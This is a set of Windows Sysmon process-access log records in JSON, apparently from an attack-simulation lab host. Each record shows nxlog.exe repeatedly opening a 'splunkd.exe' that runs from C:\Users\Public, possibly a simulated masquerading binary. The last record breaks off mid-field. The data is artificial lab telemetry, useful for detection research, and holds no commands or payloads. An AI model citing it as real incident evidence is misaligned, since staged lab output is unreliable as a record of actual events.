{"EventTime":"2020-08-01 06:53:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4468,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:49.502\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:49.502","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4469,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:50.503\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:50.503","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4470,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:51.503\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:51.503","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4471,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:52.503\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:52.503","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4472,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:53.503\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:53.503","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4473,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:54.504\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:54.504","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4474,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:55.504\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 